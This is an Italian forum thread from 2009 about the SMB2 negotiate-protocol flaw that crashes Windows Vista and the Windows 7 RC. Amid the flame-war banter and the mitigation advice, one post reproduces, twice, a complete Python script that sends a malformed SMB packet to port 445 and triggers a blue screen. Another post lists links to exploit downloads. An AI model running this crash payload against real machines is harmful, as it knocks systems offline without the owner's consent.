USA? Ti sei forse perso le ultime stagioni delle Iene? 90% Apple, 10% di prodotti non riconoscibili in quanto marchi oscurati, al contrario della apple, con la mela sempre in primo piano, sarà un caso:D ?
E' risaputo che le Yene su Italia1 fanno pubblicita' occulta ad Apple mettendo sempre ben in vista i notebook Apple con la mela nelle loro riprese e servizi.Lo sanno oramai tutti quelli nel settore
mail9000it
09-09-2009, 14:51
L'importante e' che quando uscira' la final release in vendita al pubblico e che la comprera' la falla sia corretta
Problema semantico.....
"la final release in vendita al pubblico" è la RTM scaricabile dal 14/08/2009 punto.
modificando la frase tua frase in :
"... che al momento dell'uscita delle confezioni sugli scaffali sia disponibile la patch di correzzione..."
allora sono d'accordo.
eccone un altro :asd: Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere :) parla da fine ottobre 2009
In ogni caso il tuo "meglio tacere parla da fine ottobre" nonostante lo smile potevi risparmiartelo, perchè errato e fuori luogo.
Le software house devono poter garantire la compatibilità dei loro programmi con Win7 il prima possibile e non possono aspettare il 22 per iniziare a fare i test.
E a queste società MS ha venduto Win7 con un abbonamento annuale da più di 2000 dollari (ora non ricordo gli importi esatti).
Comunque ringrazio G1971B per la sua segnalazione sull'argomento specifico dimostrando che è possibile chiedere e parlarne senza dover aspettare fine ottobre.
Liquid.Tension
09-09-2009, 14:53
E' risaputo che le Yene su Italia1 fanno pubblicita' occulta ad Apple mettendo sempre ben in vista i notebook Apple con la mela nelle loro riprese e servizi.Lo sanno oramai tutti quelli nel settore
CVD :doh:
mail9000it
09-09-2009, 14:53
non hoi mai viso Microsoft tenere aperte per 8 mesi come hai scritto falle critiche di cui sopra senza patcharle
Se ho tempo ti cerco la falla in oggetto.
Sulla rete se ne parlato per un anno.
Edit...
Forse era una falla di IE ma visto lo stretto legame tra IE e SO presente al tempo era quasi la stessa cosa.
Luposardo
09-09-2009, 14:54
e' solo una falla, problema risolto su win7 a quanto pare.. ma che vi aspettavate? dovremmo commentare certe cose tutti allo stesso modo!
Problema semantico.....
"la final release in vendita al pubblico" è la RTM scaricabile dal 14/08/2009 punto.
modificando la frase tua frase in :
"... che al momento dell'uscita delle confezioni sugli scaffali sia disponibile la patch di correzzione..."
allora sono d'accordo.
L'immagine del Dvd di installazione di Win7 adesso verra' aggiornata per fornire un DVD installer con Win7 corretto per il 22 ottobre 2009.
mi sembra logico no?
In ogni caso il tuo "meglio tacere parla da fine ottobre" nonostante lo smile potevi risparmiartelo, perchè errato e fuori luogo.
Le software house devono poter garantire la compatibilità dei loro programmi con Win7 il prima possibile e non possono aspettare il 22 per iniziare a fare i test.
E a queste società MS ha venduto Win7 con un abbonamento annuale da più di 2000 dollari (ora non ricordo gli importi esatti).
Comunque ringrazio G1971B per la sua segnalazione sull'argomento specifico dimostrando che è possibile chiedere e parlarne senza dover aspettare fine ottobre.cosa c'entrano le software House con la falla?
I software vengono testati su Win7 RTM lo stesso.. e la falla sulla RTM non c'e'
goldorak
09-09-2009, 15:04
Falla del piffero, che probabilità ci sono che possa essere usata? Quante persone che hanno win 7 non sono dietro un router/firewall? E anche quando, che interesse può avere un hacker a farti comparire una schermata blu? E anche quando ciò avvenga, quale sarebbe il danno?
Insomma, si parla di nulla. Tra l'altro il s.o. non è ancora uscito ed è stato distribuito proprio per questo, un motivo ci sarà no? :rolleyes:
Tu si che sei un genio. :asd:
Se ti faccio riavviare il tuo pc 20 volte al giorno (per cosi' mi diverto) che danno ti faccio ?
Se ti installo spyware che danno ti faccio ?
Insomma parliamo del nulla vero ?
Prendi il mio consiglio, usa Windows 7 direttamente collegato a internet, non patcharlo perche' cosi' di suo e' sicuro, non usare firewall o antivirus che tanto non servono a niente. Cosa vuoi che ti capiti ?
Il nulla, tanto un riavvio inaspettato o una BSOD e' sempre colpa dei drivers o del hardware malfunzionante.
Hai vinto la palma d'oro. :winner:
Raga, ma a nessuno di quelli che tra voi stanno testando Windows 7 è capitato che crashasse il sistema e al riavvio il desktop fosse scomparso?
Mai avuto un crash con Seven RC.
Ripeto
Confirmed: Windows 7 RTM not affected by reported zero-day flaw in SMB2. http://bit.ly/HHifR
è dal secondo post che lo dici :asd:
mi sa che continuano a non leggere...
e detto questo si potrebbe anche chiudere la discussione o quantomeno cambiare il titolo della notizia.
Tu si che sei un genio. :asd:
Se ti faccio riavviare il tuo pc 20 volte al giorno (per cosi' mi diverto) che danno ti faccio ?
Se ti installo spyware che danno ti faccio ?
Insomma parliamo del nulla vero ?
Prendi il mio consiglio, usa Windows 7 direttamente collegato a internet, non patcharlo perche' cosi' di suo e' sicuro, non usare firewall o antivirus che tanto non servono a niente. Cosa vuoi che ti capiti ?
Il nulla, tanto un riavvio inaspettato o una BSOD e' sempre colpa dei drivers o del hardware malfunzionante.
Hai vinto la palma d'oro. :winner:Comunque partendo dal presupposto che un buon user usa un router con firewall Nat per proiettarsi su internet , tiene attivo il firewall di Windows ed in piu' usa un buon antivirus in questo caso l'exploitaggio di questa falla da remoto e' dura , ma molto dura...nel senso che per poter exploitare questa falla bisogna che lo user sia poprio un niubbo totale ovvero senza tutto cio' che ti ho citato qua sopra
certo che se uno fa Flame viene cazziato...pero' la redazione puo' permettersi di scrivere titoli del genere solo per aumentare i post, generare più traffico e fare quindi più soldi tramite pubblicità...
...che tristezza
e poi visto che la falla non esiste più da windows 7 RTM in poi....perchè non cambiate il titolo della news?
mi sa che continuano a non leggere...
ho notato :D
ho notato :Dmolti comunque credo si lamentino perche' stanno usando Win7 RC come OS primario di base e come sai la RC adesso non e' ancora patchata :D in questo caso basta che usino router adsl per andare su internet + il firewall software Win7 lo ha attivo di default e non gli si exploita niente da remoto lo stesso anche senza patch :D
Simock85
09-09-2009, 15:21
Non ce la facciamo eh...
Seven RTM non è vulnerabile.
Vista SP2 è vulnerabile, è questa la notizia.
Ho effettuato qualche prova, iniettare codice sfruttando questa vulnerabilità è molto difficile. Il BSOD arriva con l'header del pacchetto di negoziazione, anche se il codice sta nel corpo del pacchetto manca il tempo materiale per eseguirlo.
Il punto prima non toglie che sia impossibile, infatti è giusto aspettarsi una patch che corregga l'errore nel parsing della stringa Process Id High.
Stare dietro a un router/firewall serve a poco se sono state aperte le porte per la condivisione file/periferiche (che ovviamente si aprono da sole grazie a UPnP).
Per vivere sereni aspettando la patch basta impostare le reti come pubbliche (non domestiche o aziendali)
jeremy.83
09-09-2009, 15:21
comunque il problema è che purtroppo dipendiamo per moltissime cose da windows e questo è sbagliato, bisogna diversificare e no non è possibile che i bancomat usino windows ( del resto versioni che vanno da nt4 a 2000, quindi roba vecchia e non patchata )
Sono in generale d'accordo con tutto quello che dici, anche con la parte che ho omesso, però anche le banche con tutti i soldi che hanno potrebbero tranquillamente rinnovarsi. Ricordo l'anno scorso che ero andato a fare la carta di credito e l'impiegata di banca ha inserito i dati nel sito / area protetta della banca utilizzando però IE 6 :muro: :muro: :muro:
Stavo per dirle di lasciar perdere, poi ho cambiato idea :stordita:
Curiosa sta notizia anche perchè oggi mi è arrivato un update di sicurezza per la RC (non questa però)
E comunque se l'RTM non è infetta significa che i tester avevano già scovato il bug, o no?
Non ce la facciamo eh...
Seven RTM non è vulnerabile.
Vista SP2 è vulnerabile, è questa la notizia.
Ho effettuato qualche prova, iniettare codice sfruttando questa vulnerabilità è molto difficile. Il BSOD arriva con l'header del pacchetto di negoziazione, anche se il codice sta nel corpo del pacchetto manca il tempo materiale per eseguirlo.
Il punto prima non toglie che sia impossibile, infatti è giusto aspettarsi una patch che corregga l'errore nel parsing della stringa Process Id High.
Stare dietro a un router/firewall serve a poco se sono state aperte le porte per la condivisione file/periferiche (che ovviamente si aprono da sole grazie a UPnP).
Per vivere sereni aspettando la patch basta impostare le reti come pubbliche (non domestiche o aziendali)
anche su Vista basta usare router adls.I router Adsl hanno UPnP disabilitato di default quindi anche se un programma aperto su windows e che va in rete volesse aprire qualche porta sul router usando il Framework UPnP di Win e di conseguenze aprire le stesse porte anche su Windows firewall software in ricezione , non lo possono fare..Poi anche se fosse le porte che si devono aprire in ricezione tramite UPnP devono essere quelle del servizio SMB2 non porte a casaccio di un altro software con altro servizio in listen sul computer
Simock85
09-09-2009, 15:33
anche su Vista basta usare router adls.I router Adsl hanno UPnP disabilitato di default quindi anche se un programma aperto su windows e che va in rete volesse aprire qualche porta sul router usando il Framework UPnP di Win e di conseguenze aprire le stesse porte anche su Windows firewall software in ricezione , non lo possono fare..Poi anche se fosse le porte che si devono aprire in ricezione tramite UPnP devono essere quelle del servizio SMB2 non porte a casaccio di un altro software con altro servizio in listen sul computer
Sbagli, UPnP è abilitato di default su molti router, gran parte dei Linksys ad esempio.
Non capisco il tuo secondo passaggio, UPnP apre la porta 445 se il pc ha attivato la condivisione files. Che c'entrano gli altri software :mbe: ??
LeaderGL2
09-09-2009, 15:39
Mi credete...che tristi questi commenti.
Innanzitutto cos'è SMB (per chi non lo sapesse): http://en.wikipedia.org/wiki/Server_Message_Block
La versione 2.0 (quella di cui si parla) è stata rilasciata con Windows Vista, per questo motivo i sistemi operativi precedenti non sono affetti dal problema. Vengono scoperte falle in qualsiasi tipo di protocollo ed è normale e se non era stata scoperta in 3 anni che esiste Windows Vista (2006) vuol dire che non era tanto banale scoprirla e quindi figuriamoci utilizzarla.
Inoltre in Windows 7 (finale) non è presente.
Detto questo non capisco il motivo di tutti sti flame (sia a favore che contro Microsoft).
Se fossi tra quelli a favore Microsoft semplicemente eviterei di dare ossigeno a queste polemiche.
Se fossi tra quelli contro Microsoft (e tendenzialmente sono gli utenti PRO Apple) penserei agli svariati bug trovati in Snow Leopard a 1 giorno dalla sua uscita.
Tutto il software presenta dei bug (ci sono delle statistiche che danno come fisiologici X bug ogni Y righe di codice), detto questo è molto importante valutare la facilità di scoperta del problema e come questo possa essere utilizzato per "danneggiare" il sistema o il disagio che può arrecare all'utente (che usa il sistema).
Sbagli, UPnP è abilitato di default su molti router, gran parte dei Linksys ad esempio.
Non capisco il tuo secondo passaggio, UPnP apre la porta 445 se il pc ha attivato la condivisione files. Che c'entrano gli altri software :mbe: ??
Io su router netgear , dlink , zyxel etc su cui ho messo mano ho sempre visto UPnP disattivo di default per ovvie ragioni di sicurezza.Se i router adsl Linksys hanno UPnP attivo di default mi sembra propio una grande boiata per la sicurezza.
Non ho mai visto un servizio di sistema in listen ( in ascolto) su Windows (come netbios etc ) andare a "comandare" il router adsl con UNpN attivo per farsi aprire le sue porte di ricezione appunto anche sul router come fosse un port forward automatico ( dopo cosi dalla wan entrano tutti sul sistema) :rolleyes:
Queste cose le fanno i programmi che lo user ha aperto sul sistema e che vanno in rete, come ad esempio un Msn Messenger puo' con UPnP attivo sul router pilotare lo stesso router per farsi aprire in automatico una porta Tcp random in caso sempre Msn debba stabilire un contatto diretto punto punto con un altro computer con Msn per far partire un file transfer diretto tra i 2 computer senza passare dal server Microsoft ( + lento) e solo alla bisogna .....ma non i servizi di sistema di windows ..
http://www.neowin.net/news/software/09/09/09/microsoft-windows-7-is-not-affected-by-zero-day-flaw
Simock85
09-09-2009, 15:55
Non ho mai visto un servizio di sistema in listen ( in ascolto) su Windows (come netbios etc ) andare a "comandare" il router adsl con UNpN attivo per farsi aprire le sue porte di ricezione appunto anche sul router come fosse un port forward automatico ( dopo cosi dalla wan entrano tutti sul sistema) :rolleyes:
Uh si, hai ragione, che stupido... ho detto una cazzata :D .
Insomma è necessario avere accesso fisico alla rete. Si possono dormire sonni tranquilli.
ma cosa interessa cosa userai e cosa acquisterai tu? che non usi Os microsoft lo si e' capito subito , basta vedere come hai commentato ovvero scrivendo fesserie fa fanboy della controparte per denigrare Windows7 pur se come ben sai non e' ancora uscito :asd:
Ci si dovrebbe lamentare solo e qualora Win7 fosse uscito ufficialmente ,l'utente lo avesse pagato e dopo 2 giorni gli si presentasse la falla, non ADESSO che Win7 non e' ancora uscito
State coi piedi per terra
Lamentarsi anche dopo l'uscita significa non stare con i piedi per terra. Le falle si trovano in tutti i sistemi e ad ogni grado di pericolosità. Vogliamo parlare della falla trovata nel kernel Linux che è stata per 8 anni nel sorgente senza che nessuno se ne accorgesse (e che era anche molto piu' pericolosa di questa)? E' proprio lamentarsi di bug e falle che è stupido, da ignoranti e da persone che non capiscono un'h. La sola cosa che conta è che vengano fixate quasi immediatamente alla loro scoperta. Tutto il resto è un lamentarsi di sciocchi.
Gladiator10
09-09-2009, 18:18
Io ho Windows 7RC 32-bit mai avuto problemi,mi funziona benissimo.....:D
Lamentarsi anche dopo l'uscita significa non stare con i piedi per terra. Le falle si trovano in tutti i sistemi e ad ogni grado di pericolosità. Vogliamo parlare della falla trovata nel kernel Linux che è stata per 8 anni nel sorgente senza che nessuno se ne accorgesse (e che era anche molto piu' pericolosa di questa)? E' proprio lamentarsi di bug e falle che è stupido, da ignoranti e da persone che non capiscono un'h. La sola cosa che conta è che vengano fixate quasi immediatamente alla loro scoperta. Tutto il resto è un lamentarsi di sciocchi.Gia' risolto
http://news.cnet.com/8301-13860_3-10347289-56.html
Gia' risolto
http://news.cnet.com/8301-13860_3-10347289-56.html
Lo so che è già risolto. Stavo discutendo su una certa attitudine (banale) della gente.
Mr_Paulus
09-09-2009, 19:26
perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?
lo stesso motivo per cui gli mms ecc. sono un aggiornamento sostanzioso per l'iphone immagino.
comunque anche se fosse stato vulnerabile win7 non vedo il problema, tutti i so sono buggati, come è già stato detto basta risolvere in fretta.
sarà dovuto a questo i riavvi inaspettati del mio mediacenter?:rolleyes: :rolleyes:
Se c'è una cosa che fa proprio schifo di Vista è il media center, spero che siano riusciti a crare qualcosa di decente con 7... ma ne dubito.
Mr_Paulus
09-09-2009, 20:55
Se c'è una cosa che fa proprio schifo di Vista è il media center, spero che siano riusciti a crare qualcosa di decente con 7... ma ne dubito.
mah ti dirò il media center di w7 l'ho usato ancora poco, ma ti posso già dire che a differenza di vista mi riconosce la mia scheda tv di marca sconosciuta (in entrambi i sistemi i drivers venivano installati correttamente e su vista se usavo power cinema mi veniva riconosciuta)
poi c'è stato anche un aumento della velocità dell'applicazione..altro non so.
esce il 22 ottobre, oggi è il 9, ce la faranno a correggere questo bug...
non lo so, la produzione di vagonate di dvd richiede tempo anche con strutture immense.
poi ci lamentiamod i XP che dopo 8-9anni ha ancora un pacco di buchi!!!
robertogl
09-09-2009, 21:57
non lo so, la produzione di vagonate di dvd richiede tempo anche con strutture immense.
poi ci lamentiamod i XP che dopo 8-9anni ha ancora un pacco di buchi!!!
per l'ultima volta,spero:
nella RTM,ovvero la versione finale,ovvero quella masterizzata nei dvd che saranno venduti dal 22 ottobre,questa falla non c'è. :read:
dado2005
10-09-2009, 00:43
Ribadisco un concetto molto semplice a tutti....."non esiste sofwtare immune da bug"!!!Santa verità.
Quasi un assioma! E' uno dei primi concetti che uno studente di informatica usualmente apprende sin da subito.
Peccato che sia solo recepito dagli addetti ai lavori.
dado2005
10-09-2009, 01:03
per l'ultima volta,spero:
nella RTM,ovvero la versione finale,ovvero quella masterizzata nei dvd che saranno venduti dal 22 ottobre,questa falla non c'è. :read:Ok.
Ma potrebbero essercene altre, che nei tempi e nei modi opportuni verranno risolte, come è sempre stato.
Per inciso, il falegname a cui avevo ordinato una porta si era accorto nell'installarla che il telaio era troppo grande: riportatola nel suo laboratorio ha risolto brillantemente la faccenda.
Quindi dove sta il problema?
Mi sembra di intuire che dovremmo preoccuparci di ciò che non è risolvibile non di cio che è risolvibile.
Per inciso, il falegname a cui avevo ordinato una porta si era accorto nell'installarla che il telaio era troppo grande: riportatola nel suo laboratorio ha risolto brillantemente la faccenda.
Quindi dove sta il problema?
Mi sembra di intuire che dovremmo preoccuparci di ciò che non è risolvibile non di cio che è risolvibile.
Il mio falegname invece mi ha mandato per email direttamente una patch per il mobile del corridoio.
Scatenate l'inferno... :)
lol lol lol :rotfl: :rotfl: :rotfl:
SuperSandro
10-09-2009, 07:31
"il problema colpisce Window 7 Release candidate ma non la versione finale del sistema operativo che è stata completata nel corso del mese di Luglio."
...uhmm... morale: comprate la versione finale e rinunciate a quella semi-gratuita. (della serie "A pensar male si indovina" ).
"il problema colpisce Window 7 Release candidate ma non la versione finale del sistema operativo che è stata completata nel corso del mese di Luglio."
...uhmm... morale: comprate la versione finale e rinunciate a quella semi-gratuita. (della serie "A pensar male si indovina" ).
A tuo avviso quindi non è normale che in una release candidate ci siano bug che sono stati fixati nella versione che è diventata finale?
Spiegatemi questo ragionamento perchè a me certe congetture sono ignote, non ci arrivo.
Collision
10-09-2009, 08:11
Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test! :eek:
Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test! :eek:
Volevo dirlo anche io ma mi sono limitato, perchè a simili commenti sarebbe meglio rimanere in silenzio.
SuperSandro
10-09-2009, 08:41
A tuo avviso quindi non è normale che in una release candidate ci siano bug che sono stati fixati nella versione che è diventata finale?
Spiegatemi questo ragionamento perchè a me certe congetture sono ignote, non ci arrivo.
Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).
Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.
Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando? ;)
robertogl
10-09-2009, 08:51
Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).
Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.
Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando? ;)
probabilmente hanno riscritto il servizio da vista a seven e facendolo il bug è scomparso,magari neanche lo sapevano :boh:
SuperSandro
10-09-2009, 08:57
probabilmente hanno riscritto il servizio da vista a seven e facendolo il bug è scomparso,magari neanche lo sapevano :boh:
...della serie "Siamo tutti nelle mani del Signore".
MiKeLezZ
10-09-2009, 09:19
http://www.microsoft.com/technet/security/advisory/975497.mspx
Ma nessuno ha notato l'unico (forse) post sensato di tutta la discussione?
Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?
# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.
La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.
Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.
http://www.microsoft.com/technet/security/advisory/975497.mspx
Workarounds
Block TCP ports 139 and 445 at the firewall
These ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports.
http://www.hwupgrade.it/forum/showpost.php?p=28814138&postcount=84
Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test! :eek:
http://www.hwupgrade.it/forum/showpost.php?p=28814064&postcount=81
http://www.microsoft.com/technet/security/advisory/975497.mspx
Executive Summary
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
_____________________
Se dovesse venir scoperto che la vulnerabilita' viene exploitata in the wild Microsoft rilascera' subito la patch straordinaria correttiva sia per Vista che per Win7 RC ( la RTM di Win7 come si sa non e' affetta )
MiKeLezZ
10-09-2009, 12:33
Executive Summary
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
_____________________
Se dovesse venir scoperto che la vulnerabilita' viene exploitata in the wild Microsoft rilascera' subito la patch straordinaria correttiva sia per Vista che per Win7 RC ( la RTM di Win7 come si sa non e' affetta )ah no?
non c'è nessun attacco eh....
http://!!OCIO!!g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html
http://!!OCIO!!rapidshare.com/files/277352935/WinnukeV7.zip.html
http://!!OCIO!!rapidshare.com/files/277781832/SMB2-TEST-FLAW-EDUCATIONAL.rar.html
http://!!OCIO!!pastie.org/611098
http://!!OCIO!!pastie.org/610829
togliete !!OCIO!! ...
ah no?
non c'è nessun attacco eh....
http://!!OCIO!!g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html
http://!!OCIO!!rapidshare.com/files/277352935/WinnukeV7.zip.html
http://!!OCIO!!rapidshare.com/files/277781832/SMB2-TEST-FLAW-EDUCATIONAL.rar.html
http://!!OCIO!!pastie.org/611098
http://!!OCIO!!pastie.org/610829
togliete !!OCIO!! ...stai col router adls che ha il firewall hardware e l'attacco anche se in the wild ti fa un baffo
il problema e' solo per chi sta in rete col modem usb che come si sa espone direttamente la macchine su internet ed ha pure il firewall di Vista o WIn7 RC disabilitato o le porte Netbios aperte come eccezione :asd:
IO uso solo windows xp però son sicuro che anche su altri SO se si continua a martellare cosi come lo si fà con windows i bachi si trovano :D
danlo8600
10-09-2009, 14:43
Come al solito il titolo dell'articolo crea il delirio, ma andando ad analizzare affondo la situazione risulta più che chiaro che il sistema operativo vulnerabile è windows vista, comunque leggendo lo script a me non sembra che ci siano grossi rischi per la sicurezza e comunque per essere esposti bisogna veramente essere degli idioti e disattivare di tutto e anche di più... E comunque anche nel caso peggiore dell'idiota di turno non c'è pericolo. Sarei stato curioso di leggere i commenti di questo http://www.geekissimo.com/2008/04/05/mac-os-x-hackerato-piu-velocemente-di-windows-e-linux/
ma penso che ben pochi lo abbiano saputo.
Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).
Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.
Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando? ;)
Ma chi ha detto che la comunicazione è mancata? Guarda che i bug di Windows non passano per HWUpgrade in forma di notizia in genere :D
Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?
# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.
La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.
Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.
Quotone!! Davvero il post più sensato!
Non mi sembra il caso di dar fiato alle trombe per una vulnerabilità come le tantissime scoperte ogni giorno in tutto il mondo dell'informatica, ed è da idioti sostenere che le vulnerabilità ci sono perchè è stato fatto poco testing e ve lo sta dicendo uno che sui suoi PC non ha più windows da circa 5 anni...
_TeRmInEt_
11-09-2009, 22:57
http://thechive.com/wp-content/uploads/2009/01/fail-owned-book-title-fail.jpg
Sicuramente passerò da xp a window 7 a meno che non cambi pc più performante allora voglio provare Ubuntu :D
vBulletin® v3.6.4, Copyright ©2000-2025, Jelsoft Enterprises Ltd.